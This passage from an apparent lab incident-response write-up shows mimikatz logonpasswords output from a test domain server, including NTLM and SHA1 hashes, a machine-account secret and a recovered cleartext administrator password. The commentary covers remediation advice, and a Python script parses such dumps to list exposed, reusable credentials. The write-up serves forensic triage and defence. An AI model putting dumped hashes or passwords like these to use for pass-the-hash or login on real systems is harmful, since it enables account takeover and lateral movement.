* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
ssp :
credman :
Authentication Id : 0 ; 1042707405 (00000000:3e2673cd)
Session : Interactive from 4
User Name : DWM-4
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/28/2024 5:10:23 PM
SID : S-1-5-90-0-4
msv :
[00000003] Primary
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : 2904b55fb89731b631a1ef1523c0bd4c
* SHA1 : 01392a55fb560e396ec7ab69267d3581b49d1f08
tspkg :
wdigest :
* Username : PL-SERVER2$
* Domain : TESTLAB
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
kerberos :
* Username : PL-SERVER2$
* Domain : testlab.local
* Password : fd 19 70 d2 95 3d 64 20 f5 79 a4 63 22 8a 6c ca cb de 08 c5 76 c4 47 ae aa 29 67 07 e9 89 b7 c6 be 4f d3 5b cd ed 45 53 de 0f 44 19 3c be 82 cb c7 95 4c 6f c5 70 6b 9e 51 e2 e6 54 ce 57 c3 64 2b 21 4f 0e 74 a8 16 fc 7d 2d b3 e6 40 4b a9 ab 76 bd 79 cb ef d8 9b fd a5 ac a6 e8 6e 27 30 f6 d4 6d 0b 09 d5 ff 42 11 10 95 75 79 60 f9 9e 79 84 3a f7 bc a4 18 24 50 08 9c 49 ce 0f b8 19 fa 76 29 66 9b a6 9b 5c 5f 67 74 08 b2 81 bc 3c 39 f8 88 52 b9 90 9f 8e a9 e4 a8 da 81 dc 94 50 2c 04 57 a6 00 57 45 4e 1a b5 c2 21 bf d1 75 ca d8 01 a2 c3 42 bf a8 df 1a 5b 6e d1 9e da 77 23 42 07 d2 42 b2 2a 9b 1c 7e e1 6e 22 70 73 9e 9d 57 61 e9 6b ea 18 f9 d2 b9 8b d2 64 6d 11 c7 b1 bb fd 09 7b 2d 69 44 23 db 66 5a 5e f7 37 56 8c d2
ssp :
credman :
mimikatz #
From the dump, both the username and password of domain.admin have been recovered. The portion shown above also exposes the local built-in Administrator (SID ending in -500) with its cleartext password 123qweA@ under the wdigest provider, and the computer account PL-SERVER2$ (NTLM hash plus the machine-account secret) in the SYSTEM, NETWORK SERVICE, DWM and IIS APPPOOL sessions. A readable password under wdigest means WDigest credential caching is enabled on this server (UseLogonCredential under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest); that should be set to 0, and since LSASS memory was read, every credential in this dump, the computer account included, has to be treated as compromised and reset.
Based on the psexec command and the alert on AD, it looks like the attacker has not yet managed to move laterally to AD.
Bonus: the attacker also tried nc instead of main.exe.
Up to this point, the attacker has done nothing else.
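To triage a dump like the one above systematically (which accounts are exposed, as hash or as cleartext, regardless of which logon session happened to hold them), the following Python script parses sekurlsa::logonpasswords output in the collapsed layout shown on this page. It is an added example written for this write-up, not a tool from the lab or from the original author; the sample dump embedded in it is constructed (hashes, password, SIDs and the machine-account blob are made up), and its layout assumptions (provider names, `* Key : value` lines under each provider, `(null)` for absent secrets, hex-byte blobs for computer-account secrets) are taken from the output above.

```python
import re

# Constructed sample in the layout of `sekurlsa::logonpasswords` as shown on this page; every secret is made up.
SAMPLE = """\
Authentication Id : 0 ; 1037447963 (00000000:3dd6331b)
Session : Batch from 0
User Name : Administrator
SID : S-1-5-21-1111111111-2222222222-3333333333-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : PL-SERVER2
* NTLM : 0123456789abcdef0123456789abcdef
wdigest :
* Username : Administrator
* Domain : PL-SERVER2
* Password : Constructed-Pass1!
Authentication Id : 0 ; 596038116 (00000000:2386d1e4)
Session : Service from 0
User Name : DefaultAppPool
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
* Username : PL-SERVER2$
* Domain : TESTLAB
* NTLM : fedcba9876543210fedcba9876543210
kerberos :
* Username : pl-server2$
* Domain : TESTLAB.LOCAL
* Password : 00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff 00 11 22 33 44 55 66 77
mimikatz #
"""
SESSION_START = re.compile(r"^Authentication Id\s*:\s*(\d+)\s*;\s*(\d+)")
PROVIDERS = {"msv", "tspkg", "wdigest", "kerberos", "ssp", "credman", "cloudap", "dpapi"}
HEADER_FIELDS = {"Session", "User Name", "Domain", "Logon Server", "Logon Time", "SID"}
# wdigest/kerberos print a computer account's secret as hex bytes; that is not a typed password.
HEX_BLOB = re.compile(r"^(?:[0-9a-f]{2} ){8,}[0-9a-f]{2}$")

def parse_logonpasswords(text):
    """One dict per logon session, each carrying the secrets listed under its providers."""
    sessions, cur, provider = [], None, ""
    for line in (ln.strip() for ln in text.splitlines()):
        m = SESSION_START.match(line)
        if m:
            cur = {"auth_id": f"{m.group(1)};{m.group(2)}", "creds": []}
            sessions.append(cur)
        elif cur is None or not line:
            continue
        elif line.endswith(":") and line[:-1].strip() in PROVIDERS:      # "msv :", "wdigest :" ...
            provider = line[:-1].strip()
        elif line.startswith("*"):                                       # "* Key : value" under a provider
            key, _, val = (p.strip() for p in line[1:].partition(":"))
            if key == "Username":
                cur["creds"].append({"provider": provider, "username": val, "domain": "",
                                     "ntlm": None, "password": None, "machine_blob": False})
            elif cur["creds"] and key in ("Domain", "NTLM"):
                cur["creds"][-1][key.lower()] = val
            elif cur["creds"] and key == "Password" and val != "(null)":   # "(null)" means no secret cached
                if HEX_BLOB.match(val):
                    cur["creds"][-1]["machine_blob"] = True
                else:
                    cur["creds"][-1]["password"] = val
        else:                                                            # header line: "User Name : X"
            key, _, val = (p.strip() for p in line.partition(":"))
            if key in HEADER_FIELDS:
                cur[key] = val
    return sessions

def triage(sessions):
    """Group secrets by the owning account (provider Username/Domain), not by the session that held them."""
    accounts = {}
    for s in sessions:
        for c in s["creds"]:
            name = f"{c['domain'].split('.')[0]}\\{c['username']}".upper()   # TESTLAB == testlab.local
            a = accounts.setdefault(name, {"ntlm": set(), "cleartext": set(), "machine_blob": False,
                                           "rid500": False, "sessions": set()})
            if c["ntlm"]:
                a["ntlm"].add(c["ntlm"])
            if c["password"]:
                a["cleartext"].add(c["password"])
            a["machine_blob"] |= c["machine_blob"]
            if s.get("SID", "").endswith("-500") and s.get("User Name", "").upper() == c["username"].upper():
                a["rid500"] = True                                           # built-in Administrator RID
            a["sessions"].add(f"{s.get('Session', '?')} / {s['auth_id']}")
    return accounts

def report(accounts):
    """One line per exposed account: what whoever holds this dump can now reuse."""
    out = []
    for name, a in sorted(accounts.items()):
        haves = []
        if a["cleartext"]:
            haves.append("cleartext password (WDigest caching is enabled on this host)")
        if a["ntlm"]:
            haves.append("NTLM hash (pass-the-hash)")
        if name.endswith("$") and (a["ntlm"] or a["machine_blob"]):
            haves.append("computer-account secret (authenticates to the domain as this host)")
        tag = " [RID 500, built-in Administrator]" if a["rid500"] else ""
        out.append(f"{name}{tag}: {', '.join(haves) or 'nothing reusable'}; {len(a['sessions'])} session(s)")
    return out
```

Run it against a saved mimikatz log with `print("\n".join(report(triage(parse_logonpasswords(open(path).read())))))`. Grouping by the provider's Username/Domain rather than the session's User Name is what collapses the DWM, SYSTEM and DefaultAppPool sessions into the single PL-SERVER2$ identity, and a readable password under wdigest is the quickest indicator that WDigest caching was enabled on the host.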